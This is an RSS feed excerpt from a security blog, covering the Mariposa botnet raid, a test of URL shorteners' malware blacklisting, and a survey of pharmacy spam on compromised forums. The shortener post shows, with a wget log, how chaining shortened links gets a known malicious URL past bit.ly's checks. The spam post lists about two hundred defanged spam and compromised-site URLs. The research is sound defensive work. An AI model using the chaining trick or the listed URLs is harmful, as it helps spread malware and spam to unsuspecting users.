		<category><![CDATA[bot-net]]></category>
		<category><![CDATA[credit card]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[malicious websites]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Mariposa]]></category>
		<category><![CDATA[raid]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1456</guid>
		<description><![CDATA[&#8220;Spain Busts Hackers for Infecting 13 Million PCs&#8221;

Reuters via Threat Level &#124; Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the &#8220;largest cyber-raid to date&#8221; are just being [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;Spain Busts Hackers for Infecting 13 Million PCs&#8221;</p>
<ul>
<li>Reuters via <a href="http://www.wired.com/threatlevel/2010/03/spain-busts-hackers-for-infecting-13-million-pcs/">Threat Level | Wired.com</a></li>
</ul>
<p>Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the &#8220;largest cyber-raid to date&#8221; are just being released.</p>
<p>Infection Statistics:</p>
<ul>
<li>190 countries</li>
<li>40 of the largest financial institutions</li>
<li>50% of 1,000 largest companies</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Curse of the URL Shorteners: How Safe Are They?</title>
		<link>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/</link>
		<comments>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 17:00:57 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bit.ly]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[ow.ly]]></category>
		<category><![CDATA[tinyurl]]></category>
		<category><![CDATA[url shorteners]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1130</guid>
		<description><![CDATA[URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on twitter. In fact, URL Shortening services like [...]]]></description>
			<content:encoded><![CDATA[<p>URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on <a href="http://twitter.com/bitly" target="_blank">twitter</a>. In fact, URL Shortening services like <a href="http://twitter.com/bitly" target="_blank">bit.ly</a> have garnered so much attention that even giants like <a href="http://www.google.com" target="_blank">Google</a> and <a href="http://www.microsoft.com" target="_blank">Microsoft</a> have jumped onto the URL shortening bandwagon.</p>
<p><strong>Case in point: </strong></p>
<ul>
<li>Google: <a href="http://bits.blogs.nytimes.com/2009/12/14/googl-challenges-bitly-as-king-of-the-short/" target="_blank">goo.gl</a></li>
<li>Microsoft: <a href="http://www.techcrunch.com/2010/01/15/bing-url-shortener/" target="_blank">binged.it</a></li>
</ul>
<p>These URL shortening services are godsend for Internet surfers tired of copying and pasting long, ugly looking, URLs. But hold on a minute! All is not hunky dory in URL Shortening Land.</p>
<p>Due to processes inherent to &#8220;URL Shortening,&#8221; the original URL an Internet surfer might like to shorten is, for all purposes, being obfuscated. Is this a problem? Yes. Why, you ask? Consider the fact that people, not even necessarily tech-savvy ones, have learned to double check the links present in their emails and on websites. They even have help from various browser plugins, but in general, <a href="http://www.technewsworld.com/story/44507.html" target="_blank">users are smartening up</a>. When these same people see &#8220;shortened&#8221; links, they have no way to make a judgment call on whether visiting the link is safe, or not. For example, you may recognize <a href="http://www.stopthehacker.com" target="_blank">www.stopthehacker.com</a> as being a benign, safe to visit link, but what about <a href="http://bit.ly/oJMrP" target="_blank">bit.ly/oJMrP</a> or <a href="http://bit.ly/dc38ze" target="_blank">bit.ly/dc38ze</a>?</p>
<p>Articles published from credible sources, like <a href="http://isc.sans.org/diary.html?storyid=6589" target="_blank">ISC SANS</a>, show that URL shortening services, when compromised, can provide an excellent mechanism for malicious hackers to infect unsuspecting visitors. Criminals <a href="http://readerszone.com/google/cyber-criminals-using-url-shortening-services-to-by-pass-google-safe-browsing.html" target="_blank">use these services to bypass</a> Google&#8217;s Safe Browsing service, which is used by popular browsers.</p>
<p>To combat this growing menace, <a href="http://www.theregister.co.uk/2009/12/01/shorturl_security/" target="_blank">URL shortening services have partnered with security companies</a> to identify malicious URLs and websites. Some of them even use the <a href="http://www.surbl.org/" target="_blank">SURBL</a> blacklists to identify if someone has tried to link to a malicious website.</p>
<p>This article attempts to identify the effectiveness of security measures put in place by the various URL shortening services.</p>
<p><strong>This experiment answers the following questions:</strong></p>
<ul>
<li>Do URL shortening services have any kind of security measures in place?</li>
<li>How effective are these security measures?</li>
</ul>
<p><strong>The 25 URL shortening services evaluated in this article are listed below:</strong></p>
<p>We compare 25 URL shortening services listed below. Each URL shortening service is analyzed to measure the effectiveness of their security measures. We use a two stage process to evaluate the security implemented by each service.</p>
<pre class="brush: plain;">
snipr.com
budurl.com
bit.ly
short.to
twurl.nl
chilp.it
fon.gs
ub0.cc
snurl.com
fwd4.me
short.ie
a.gd
hurl.ws
kl.am
to.ly
hex.io
tr.im
cli.gs
urlborg.com
is.gd
sn.im
ur1.ca
tweetburner.com
tinyurl.com
snipurl.com
</pre>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 932 websites was obtained from <a href="http://www.malware.com.br" target="_blank">Malware Patrol</a> a well respected source of information about malware infected websites, which receives nearly 3,500,000 hits/month. This experiment was conducted between February 2nd and February 4th, 2010.</p>
<p>For each URL obtained from <a href="http://www.malware.com.br/" target="_blank">Malware Patrol</a>, we attempt to create shortened URLs for each site domain and full URL using each of the 25 services.</p>
<p>We denote a service as <strong>Stage 1 Compliant</strong> if it appears to use a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain. Does the URL shortening service allow a user to create a URL pointing to a malicious domain (e.g. http://www.badsite.dom)?</p>
<p>We denote a service as <strong>Stage 2 Compliant</strong> if it uses a security service or blacklist to identify malicious domains and does not allow a user to create a shortened link to any infected domain or malicious full URL hosted on that domain. Does the URL shortening service allow a user to create a URL pointing to  a malicious link hosted on a malicious domain (e.g. http://www.badsite.dom/badfolder/badfile)?</p>
<p><strong>We present the most interesting results in brief:</strong></p>
<ul>
<li>Approximately 68% of URL shortening services were <strong>Stage 1 Compliant</strong>.</li>
<li>Approximately 56% of URL shortening services were <em>exclusively</em> <strong>Stage 2 Compliant</strong>.</li>
<li>Approximately 52% of URL shortening services were <em>both</em> <strong>Stage 1 Compliant</strong> and <strong>Stage 2 Compliant</strong> (see graph below).</li>
</ul>
<p><strong>Observations on specific URL shortening services:</strong></p>
<ul>
<li>bit.ly seems to favor blocking malicious domains rather than specific links.</li>
<li>fwd4.me, hurl.ws and urlborg.com seem to favor blocking malicious links rather than specific domains.</li>
<li>bit.ly failed to qualify as <strong>Stage 2 Compliant</strong> due to 0.5% of tested URLs.</li>
<li>fwd4.me failed to qualify as <strong>Stage 1 Compliant</strong> due to 9.8% of tested URLs.</li>
<li>hurl.ws failed to qualify as <strong>Stage 1 Compliant</strong> due to 0.3% of tested URLs.</li>
<li>urlborg.com failed to qualify as <strong>Stage 1 Compliant</strong> due to 0.3% of tested URLs.</li>
</ul>
<div id="attachment_1400" class="wp-caption aligncenter" style="width: 310px"><img src="http://www.stopthehacker.com/wp-content/uploads/2010/02/Venn-300x192.png" alt="" title="Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs." width="300" height="192" class="size-medium wp-image-1400" /><p class="wp-caption-text">Venn Diagram depicting URL filtering capabilities of URL shortening services. Only about half of the most popular URL shortening services are effective at blocking malicious URLs.</p></div>
<p><strong>Stage 1 Compliant and Stage 2 Compliant services:</strong></p>
<pre class="brush: plain;">
budurl.com
cli.gs
fon.gs
hex.io
is.gd
kl.am
sn.im
snipr.com
snipurl.com
snurl.com
to.ly
tr.im
ub0.cc
</pre>
<p><strong>Deeper security issues remain:</strong></p>
<p>It seems that popular services like bit.ly, which do try to use blacklists in order to prevent malicious hackers from using their services and pointing to bad websites, can still be easily fooled by chaining together shortened URLs created by another service. We have found that if a malicious user can create a shortened URL using a service that does not implement blacklist checks or is not effective, then a service like bit.ly can be tricked into redirecting the visitor via the malicious shortened URL to a malicious domain. Effectively, users can be redirected to a malicious site regardless of bit.ly performing all its checks. See the appendix for an example below (wget log).</p>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that URL shortening services have a long way to go before Internet users can trust them to deliver safe links. About half of the most popular URL shortening services seem to be somewhat effective at blocking access to well known malicious URLs that can be found on blacklists. It remains to be seen if these URL shortening services can improve and provide a safer web experience for their users.</p>
<p><span id="more-1130"></span></p>
<h2>Appendix</h2>
<p><strong>Wget log example:</strong></p>
<p>In this example, a malicious link (hxxp://wywg.ccsfyb.cn/wywg/txer) has been shortened using ow.ly (hxxp://ow.ly/Zyv3). Then, this shortened URL is fed to bit.ly. The shortened bit.ly URL (hxxp://bit.ly/5s4YhP) is created successfully and blacklist checks are no longer effective.</p>
<pre class="brush: plain;">
$ wget -O demonstrate_bit.ly_exploit http://bit.ly/5s4YhP
--scrubbed--  http://bit.ly/5s4YhP
Resolving bit.ly... 168.143.174.29, 128.121.234.46, 128.121.254.129, ...
Connecting to bit.ly|168.143.174.29|:80... connected.
HTTP request sent, awaiting response... 301 Moved
Location: http://ow.ly/Zyv3 [following]
---scrubbed--  http://ow.ly/Zyv3
Resolving ow.ly... 75.101.155.42
Connecting to ow.ly|75.101.155.42|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer
Resolving wywg.ccsfyb.cn... 98.126.11.178
Connecting to wywg.ccsfyb.cn|98.126.11.178|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://wywg.ccsfyb.cn/wywg/txer/ [following]
---scrubbed--  http://wywg.ccsfyb.cn/wywg/txer/
Reusing existing connection to wywg.ccsfyb.cn:80.
HTTP request sent, awaiting response... 403 Forbidden
-scrubbed-- ERROR 403: Forbidden.
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8220;Online Pharmacy&#8221; Spam Stalks Internet Forums/Boards</title>
		<link>http://www.stopthehacker.com/2010/01/26/analyzing-online-pharmacy-spam/</link>
		<comments>http://www.stopthehacker.com/2010/01/26/analyzing-online-pharmacy-spam/#comments</comments>
		<pubDate>Tue, 26 Jan 2010 17:00:20 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Company]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[online pharmacy spam]]></category>
		<category><![CDATA[safebrowsing]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1143</guid>
		<description><![CDATA[Malicious hackers have, for many years, been offering services to unscrupulous individuals and companies for monetary compensation. With the growth of Email Spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch by implementing ever increasing layers of complexity to cut down on [...]]]></description>
			<content:encoded><![CDATA[<p>Malicious hackers have, for many years, been offering services to unscrupulous individuals and companies for monetary compensation. With the growth of Email Spam advertising everything from medical supplements to cars and lottery tickets, email scrubbers and filters have taken the game up a notch by implementing ever increasing layers of complexity to cut down on such spam. In turn, hackers have started to focus on advertising spam, such as medication and fraudulent scams by compromising web-based message boards and forums.</p>
<p><strong>Hackers employ two basic techniques:</strong></p>
<ul>
<li>Creating large numbers of users on forums. These accounts are then used to post spam on the message boards.</li>
<li>Exploiting Web Application vulnerabilities in the software used to run the forum.</li>
</ul>
<p>Approximately two weeks ago, <a href="http://zeltser.com/" target="_blank">Lenny Zeltser</a>, from <a href="http://isc.sans.org" target="_blank">ISC SANS</a>, posted an informative <a href="http://isc.sans.org/diary.html?storyid=8032" target="_blank">article</a> about online pharmacy ads popping up on message boards. In this vein we have conducted a limited experiment with about 14,000 websites which contain spam announcing online pharmacies.</p>
<p><strong>The aim of the experiment:</strong></p>
<ul>
<li>What percentage of websites which advertise online pharmacies are message boards and Internet forums?</li>
<li>What Web Applications, e.g. CMS packages, are used on the message boards that are compromised?</li>
</ul>
<p>We believe this will provide us with a rough estimate of how focused are hackers toward using message boards and forums on the Internet to advertise spam. From another perspective, it will provide us some idea of how vulnerable websites are if it hosts a message board or forum from being abused by hackers.</p>
<p><strong>Testing methodology:</strong></p>
<p>We have used <a href="http://www.google.com" target="_blank">Google</a> to mine the websites which contain certain keyword patterns such as &#8220;buy zocor online&#8221;, or &#8220;buy brand kamagra online&#8221; etc. Once the links suggested by <a href="http://www.google.com/" target="_blank">Google</a> were mined, each of the websites was tested against <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a> to determine if they had hosted malware (according to Google). Next, an analysis was done to determine if the link(s) mined from <a href="http://www.google.com/" target="_blank">Google</a> pointed to a forum or message board. This was done by identifying the presence of multiple strings inside a link. For example, if a link has the keywords &#8220;topic&#8221;, &#8220;view&#8221;, &#8220;thread&#8221; or similar keywords, including characters associated with dynamic page generation, it is probably hosting a message board or forum.</p>
<p>The test was conducted between January 21st and January 23rd, 2010.</p>
<div id="attachment_1150" class="wp-caption aligncenter" style="width: 427px"><img class="size-full wp-image-1150" title="Popular software packages installed on compromised forums and message boards." src="http://www.stopthehacker.com/wp-content/uploads/2010/01/pharmacy_spam_cms.jpeg" alt="Popular software packages installed on compromised forums and message boards." width="417" height="389" /><p class="wp-caption-text">Popular software packages installed on compromised forums and message boards.</p></div>
<p><strong>We present the most interesting results below:</strong></p>
<ul>
<li>47.9% of websites displaying &#8220;online pharmacy&#8221; spam are message boards and forums.</li>
<li>None of the websites advertising &#8220;online pharmacy&#8221; spam were listed on <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google Safe Browsing List</a>.</li>
<li>20.28% of forums displaying &#8220;online pharmacy&#8221; spam were using Jquery.</li>
<li>15.73% of forums displaying &#8220;online pharmacy&#8221; spam were using phpBB.</li>
<li>11.54% of forums displaying &#8220;online pharmacy&#8221; spam were using WordPress.</li>
<li>10.84 % of forums displaying &#8220;online pharmacy&#8221; spam were using Mootools.</li>
</ul>
<p>These results and other software packages, helper-scripts, tracking-code are depicted in the graph presented above.</p>
<p>This small experiment shows that a high percentage of websites displaying online spam campaigns are message boards or forums. This indicates that there are many unsecured software installations and older software packages still in use which are often exploited by malicious individuals to post spam. Further, it seems that most sites which were hacked are using jQuery. This supports <a href="http://www.stopthehacker.com/2009/12/09/when-benign-scripts-attack-v/" target="_blank">our previous observations</a> regarding jQuery scripts being used to push malware to unsuspecting visitors.</p>
<p><span id="more-1143"></span><br />
<strong>Below we present some sample links which lead to &#8220;online pharmacy&#8221; spam ads:</strong></p>
<p>We strongly suggest that you do not visit the below sites.</p>
<pre class="brush: plain;">
hxxp://agingparents.com/blog/wp-comments.php?id_comments=1041
hxxp://agnitech.net/forums/viewtopic.php?f=2&amp;t=426
hxxp://altlingo.com/community/members/zocor+online+24q.aspx
hxxp://aslansin.com/members/zocor-package-insert-26i/default.aspx
hxxp://beanbol.com/purchase-zocor-(simvastatin)-40-mg.html
hxxp://beanbol.com/zocor-(simvastatin)-20-mg.html
hxxp://blog.firestats.cc/
hxxp://blog.firestats.cc/49
hxxp://blogs.bet.com/music/soundOff/about/?cp=13
hxxp://blogs.greenpeace.ca/?proto=713
hxxp://blogs.greenpeace.ca/?proto=715
hxxp://blogs.inquirer.net/happynest/2009/10/09/just-sing/
hxxp://boards.tx-outdoors.com/viewtopic.php?f=2&amp;t=467
hxxp://buy-cheap-zocor.hi5.com/
hxxp://cheapzocor.com/
hxxp://cheapzocor.com/about/
hxxp://coilhouse.net/?deppsa=710
hxxp://coilhouse.net/?deppsa=715
hxxp://community.burton.com/members/zocor+interaction+10a.aspx
hxxp://en.netlog.com/clan/BuyZocorOnline
hxxp://en.netlog.com/clan/zocor
hxxp://eostrava.cz/post-80523-cheap-zocor/
hxxp://f5fest.com/?p=50
hxxp://fans.askaninja.com/profiles/blogs/buy-zocor-no-prescription-buy
hxxp://feedblogger.net/members/cost-zocor-68l.aspx
hxxp://foros.canaljuegos.com/index.php?topic=1067891.0
hxxp://foro.toplatino.net/viewtopic.php?f=3&amp;t=17031
hxxp://forsale.oodle.com/view/buy-zocor-online-and-treat-the-cholesterol-problems/1763399272-seattle-wa/
hxxp://forum.asian-autoparts.eu/viewtopic.php?p=4234&amp;sid=82d1fc8ea8bf7189150dda0674d1d9b0
hxxp://forum.atiz.com/index.php?topic=362.msg665;topicseen
hxxp://forum.autonews.fr/index.php?showtopic=43369&amp;view=getlastpost
hxxp://forum.jiwang.org/index.php?showtopic=44638
hxxp://forum.lugarcerto.com.br/viewtopic.php?f=13&amp;t=1022
hxxp://forum.ronatvan.com/index.php?action=printpage;topic=3171.0
hxxp://forum.ronatvan.com/index.php?topic=3171.0
hxxp://forums.solmetra.com/viewtopic.php?f=2&amp;t=67911
hxxp://forums.solmetra.com/viewtopic.php?f=3&amp;t=48102
hxxp://forum.tag-board.com/showthread.php?p=70359
hxxp://forum.tarad.com/index.php?action=printpage;topic=23901.0
hxxp://forum.vachealait.com/viewtopic.php?f=3&amp;t=123806
hxxp://forum.vachealait.com/viewtopic.php?f=5&amp;t=124103
hxxp://forum.vladimirmedvedev.com/index.php?topic=190.0
hxxp://forum.vortue.com/showthread.php?p=114540
hxxp://gallopinghillcaterers.com/?page=buy-online-zocor&amp;f=1262906101
hxxp://gameinformer.com/blogs/members/b/buy_zocor_warnings_blog/archive/2009/12/18/buy-zocor-warnings-pu4.aspx
hxxp://gameinformer.com/members/zocor_2D00_online/default.aspx
hxxp://gfestival.com/?pages=157
hxxp://gfestival.com/?pages=65
hxxp://grabhot.com/index.php?topic=2537.0
hxxp://groups.adobe.com/posts/534b2ec31b
hxxp://harvardcitizen.com/?zine=1144
hxxp://harvardcitizen.com/?zine=4200
hxxp://historias.masoportunidades.com.ar/?page_navg=3879
hxxp://ibls.com/cs/members/zocor+pricing+44n.aspx
hxxp://identi.ca/andres250
hxxp://identi.ca/zachery328
hxxp://innfromthenight.com/forum/viewtopic.php?f=28&amp;t=57971&amp;p=60406
hxxp://jackpenate.com/forum/viewtopic.php?pid=16485
hxxp://leegibbons.com/formbuilder/web/pharmacy/zocor/p=tricor-zocor.html
hxxp://letterheadforemail.com/Zocor.html
hxxp://mabonline.net/tablets-zocor-(simvastatin)-5-mg.html
hxxp://mabonline.net/zocor-(simvastatin)-for-sale.html
hxxp://matadornetwork.com/
hxxp://my.superbasket.gr/viewtopic.php?f=4&amp;t=1562&amp;p=2139
hxxp://naturalpet-com.safepages.com/showthread.php?t=1071
hxxp://networking.bizjournals.com/Jonny2
hxxp://noprescriptiononlinepharmacy.ca/zocor.html
hxxp://pastebin.ca/1743811
hxxp://pornknight.com/zocor-depression-t14855.html
hxxp://posterous.com/people/37qTcxHC297r
hxxp://punkrock.org/buyzocoronline1075&amp;v=comments
hxxp://ranahan.dephan.go.id/forum/viewtopic.php?f=2&amp;t=6803
hxxp://responsiblemarketing.com/blog/?generic=3880
hxxp://room.vicman.net/viewtopic.php?f=2&amp;t=147874
hxxp://room.vicman.net/viewtopic.php?f=4&amp;t=147047
hxxp://technorati.com/blogs/zocorlinks.blogspot.com
hxxp://thebristolfestival.org/README.php?tbf=746
hxxp://theevonyforum.com/online-zocor-purchase-buy-cheap-zocor-t433.html?sid=c64462e6e1214d18ea22e365c76aa13d
hxxp://thisis50.ning.com/forum/topics/buy-zocor-from-a-usa-pharmacy
hxxp://tk-twk.nets.hk/viewtopic.php?f=42&amp;t=11427
hxxp://tohanschik.ru/viewtopic.php?t=1380&amp;view=previous&amp;sid=5ccac30f7095c3421d89b8a3c16a23a4
hxxp://twit88.com/home/node/10289
hxxp://virb.com/rushots/posts/text/6881665
hxxp://visualstudiogallery.msdn.microsoft.com/it-IT/4ec90b81-93e4-4435-b627-4410e6028af9?persist=True
hxxp://webradiocharts.eu/forum/viewtopic.php?f=4&amp;t=376
hxxp://wiki.pylonshq.com/display/~heetley/BUY+Zocor+LOWEST+prices+NOW
hxxp://wiki.pylonshq.com/display/~heetley/BUY+Zocor+LOWEST+prices+NOW?showComments=true&amp;showCommentArea=true
hxxp://www.247-pharmacy.com/buy/zocor.php
hxxp://www.abbeyproperties.co.uk/config.php?set_user=1&amp;s=1264
hxxp://www.abbeyproperties.co.uk/config.php?set_user=1&amp;s=1996
hxxp://www.aldaracreamonline.co.uk/buy-zocor.htm
hxxp://www.antidepressantscheaper.com/
hxxp://www.aperitto.com/support/forum/12-emr-suite/511-meridian-two-bit-pharmacy-appraiser-it
hxxp://www.articlesbase.com/health-articles/online-pharmacy-offers-the-most-competitive-prices-on-zocor-869351.html
hxxp://www.atalasoft.de/cs/members/zocor+400+mg+53b.aspx
hxxp://www.avatarpress.com/2010/01/22/post-80540-buy-zocor/
hxxp://www.blogged.com/topics/zocor/
hxxp://www.bowlofcereal.net/viewtopic.php?f=5&amp;t=99
hxxp://www.brbooks.co.uk/zocor-(simvastatin)-10-mg-free-shipping.html
hxxp://www.canadianhealthcaremall.net/drug-zocor123.shtml
hxxp://www.canamericaglobal.com/products/Zocor/20/
hxxp://www.chemistdirect.co.uk/zocor-simvastatin-10-mg-tablets_4_12038.html
hxxp://www.chemistdirect.co.uk/zocor-simvastatin-40-mg-tablets_4_12040.html
hxxp://www.chop.edu/forum/user/profile/12110.page
hxxp://www.clockworkpharmacy.com/zocor-heart-pro-tablets-10mg.html
hxxp://www.copykatchat.com/
hxxp://www.cruisersforum.com/forums/members/inxgwo32-30799.html
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=26&amp;t=43370
hxxp://www.daanbantayan.gov.ph/dbforums/viewtopic.php?f=28&amp;t=43373
hxxp://www.divingleisurelondon.co.uk/forum/online-zocor
hxxp://www.drugs-s.com/product-35-prd_12.html
hxxp://www.elakiri.com/forum/showthread.php?p=6341304
hxxp://www.europeanirish.com/index.php?med_id=buy-zocor-(simvastatin)-10-mg
hxxp://www.europeanirish.com/index.php?med_id=buy-zocor-(simvastatin)-40-mg
hxxp://www.fastcompany.com/tag/pharmacy
hxxp://www.feld.com/blog/archives/2007/02/buy-zocor-online.html
hxxp://www.feld.com/blog/archives/2007/02/online-buy-zocor-without-a-prescription.html
hxxp://www.fioricetpharmacy.info/product.php?prod=Zocor
hxxp://www.flexyx.com/Z/Zocor.html
hxxp://www.folkd.com/go/zocor+lipitor
hxxp://www.forkncork.com/?p=80540
hxxp://www.forkncork.com/?p=80544
hxxp://www.freecodesource.com/user/profile-354708.html
hxxp://www.freecodesource.com/user/profile-354802.html
hxxp://www.genbrand-rx.com/Zocor.html
hxxp://www.genericmedsfromcanada.com/
hxxp://www.genericmedsfromcanada.com/ZOCOR_80_mg_GENERIC_SIMVASTATIN_80_mg_28_Tabs_p/sim0753b.htm
hxxp://www.genericsmed.com/buy-cheap-generic-zocor-simvastatin-p-21.html
hxxp://www.genv.net/en-us/node/10875
hxxp://www.giustiziere.org/viewtopic.php?f=7&amp;t=10277
hxxp://www.globaltrainingcenter.com/news.php?node=1412
hxxp://www.globaltrainingcenter.com/news.php?node=682
hxxp://www.goprocamera.com/admin/_js/tiny_mce/themes/advanced/files/buying-zocor-legally.html
hxxp://www.goprocamera.com/admin/_js/tiny_mce/themes/advanced/files/buy-zocor-without-a-prescription.html
hxxp://www.gradcats.org/index.php?option=com_content&amp;view=section&amp;layout=blog&amp;id=1&amp;Itemid=2&amp;node=2156
hxxp://www.gradcats.org/index.php?option=com_content&amp;view=section&amp;layout=blog&amp;id=1&amp;Itemid=2&amp;node=3753
hxxp://www.gripenet.pt/blog/?p=80521
hxxp://www.gripenet.pt/blog/?p=80528
hxxp://www.hcs.harvard.edu/~salient/site/?menus=715
hxxp://www.hip-hop.net/profile/buyzocorG9FG
hxxp://www.hip-hop.net/profile/Fredmd
hxxp://www.hkcd-team.net/viewtopic.php?f=7&amp;t=284
hxxp://www.ibiblio.org/agray/brushd/cheapest-price-for-zocor-40-mg.html
hxxp://www.ibiblio.org/agray/brushd/does-effect-have-libido-womens-zocor.html
hxxp://www.inansurucukursu.com/inan/forum/index.php?topic=2153.0;wap2
hxxp://www.inyoursuburb.com.au/forum/viewtopic.php?f=25&amp;t=12069
hxxp://www.ipetitions.com/petition/buy_ambien_online_480/
hxxp://www.kucasnova.net/index.php?topic=1911.0
hxxp://www.kucasnova.net/index.php?topic=2378.0
hxxp://www.last.fm/user/zocor7103
hxxp://www.lerpg.com/forum/index.php?topic=1716.0
hxxp://www.livestrong.com/zocor-side-effects/
hxxp://www.mahalo.com/answers/drugs/where-can-you-buy-lipitor-online-is-it-cheaper
hxxp://www.makingthings.com/wiki/document.zocor-online-order
hxxp://www.masterseek.com/q/Zocor/0/1/Zocor.htm
hxxp://www.mathleagueforum.com/viewtopic.php?f=2&amp;t=41
hxxp://www.menieresforum.com/?q=node/132
hxxp://www.michwine.com/index.php?Itemid=148&amp;option=com_jcalpro&amp;Subitem=3562
hxxp://www.michwine.com/index.php?Itemid=148&amp;option=com_jcalpro&amp;Subitem=773
hxxp://www.mister-wong.com/topics/zocor/
hxxp://www.mombu.com/hdtv/hdtv/t-buy-lipitor-online-no-prescription-needed-3828654.html
hxxp://www.mypage.com/buyzocor862/extendedprofile
hxxp://www.nfu.org/forum/archive/index.php?t-20956.html
hxxp://www.numberstemplates.com/forums/showthread.php?t=977
hxxp://www.offshorerx.com/drug/buy_generic_zocor.htm
hxxp://www.online-drugstore-usa.com/cheap_cardiovascular_prices/buy_generic_zocor_pills
hxxp://www.onlinepillspro.com/buy/zocor.html
hxxp://www.oxygenoverkill.com/forum/viewtopic.php?f=2&amp;t=15
hxxp://www.pharmacyescrow.com/s3737-s-ZOCOR.aspx
hxxp://www.pharmacyescrow.com/s41524-s-ZOCOR.aspx
hxxp://www.photography-now.net/help/index?no-rx=1475
hxxp://www.photography-now.net/katja_oluscha_grunther/index?no-rx=3348
hxxp://www.pillsforall.com/cholesterol-lowering/zocor-40mg-generic-x-60/prod_57.html
hxxp://www.pillwatch.com/product/zocor/
hxxp://www.postnewsline.com/2009/04/the-post-new-website.html
hxxp://www.praktikum.de/forum/online-zocor-purchase-prescription-zocor-t12436.html
hxxp://www.psicologico.cl/?favorite=4356
hxxp://www.pyzam.com/profile/3304209
hxxp://www.pyzam.com/profile/3304382
hxxp://www.rfidtalk.com/showthread.php?p=19119
hxxp://www.rottentomatoes.com/vine/showthread.php?p=16528906
hxxp://www.rottentomatoes.com/vine/showthread.php?t=709353
hxxp://www.scribd.com/doc/25364786/buy-cheap-Generic-Zocor-Simvastatin-20mg-online-without-prescription
hxxp://www.server2go-web.de/forumng/index.php?topic=111147.0
hxxp://www.spurs11.com/forum/showthread.php?t=69947
hxxp://www.teamhallpass.com/2010/01/post-80522-buy-zocor/
hxxp://www.teamhallpass.com/2010/01/post-80527-about-zocor/
hxxp://www.technieuws.org/?p=83598
hxxp://www.technieuws.org/?p=83620
hxxp://www.tempuspharmacy.org/zocor-drug-information.html
hxxp://www.theartofthepossible.net/?p=83620
hxxp://www.theunforsaken.com/viewtopic.php?f=3&amp;t=7668&amp;p=8971
hxxp://www.thisis50.com/xn/detail/784568:Topic:18648223?xg_source=activity
hxxp://www.travelersnation.com/forum/post774.html
hxxp://www.tumblr.com/tagged/saints+&amp;amp%3B+sinners
hxxp://www.twit88.com/home/node/10117
hxxp://www.valuepharmaceuticals.com/medicine/index.php
hxxp://www.wehopres.org/?p=83620
hxxp://www.wikio.com/article/122956318
hxxp://www.wikio.com/sports/football/football_players/michael_koenen
hxxp://www.wizard101.pl/forum/buy-zocor-drugs-online-zocor-t296.html
hxxp://www.world-drugs.net/order_generic_zocor.php
hxxp://www.xlpharmacy.com/
hxxp://www.xlpharmacy.com/generic-zocor/
hxxp://www.zenpharmacy.com/Zocor/buy-prescription-Zocor-online.html
hxxp://zocoronline130.typepad.com/blog/2010/01/buy-zocor-estrogen.html
hxxp://36poker.ru/forum/index.php?topic=2188.0
hxxp://ad-bu.chavalar.com/forum/index.php?topic=124.0
hxxp://alexatutor.com/viewtopic.php?f=2&amp;t=838&amp;p=915
hxxp://articlet.com/article7179.html
hxxp://bb.obscurusfio.com/index.php?topic=279.msg406
hxxp://bb.peak2010.org/viewtopic.php?f=2&amp;t=31619
hxxp://bbs.qqcipher.com/viewtopic.php?f=2&amp;t=51
hxxp://benthanhgold.com/forum/viewtopic.php?f=8&amp;t=1487
hxxp://biblioteca.uniminuto.edu/index.php/biblioteca-en-cifras/1297?task=view&amp;page=975
hxxp://bigcuzinent.com/forum/index.php?topic=29.0
hxxp://blog.see3.net/?p=484
hxxp://blogs.inquirer.net/m-ph/2008/08/29/nikon-d90-official-1st-dslr-with-hd-video-recording/
hxxp://boards.tx-outdoors.com/viewtopic.php?f=2&amp;t=343
hxxp://buycheapviagra.ca/kamagra.html
hxxp://buycialis20mg.com/buy-kamagra-soft-tabs.htm
hxxp://buy-kamagra-online.net/
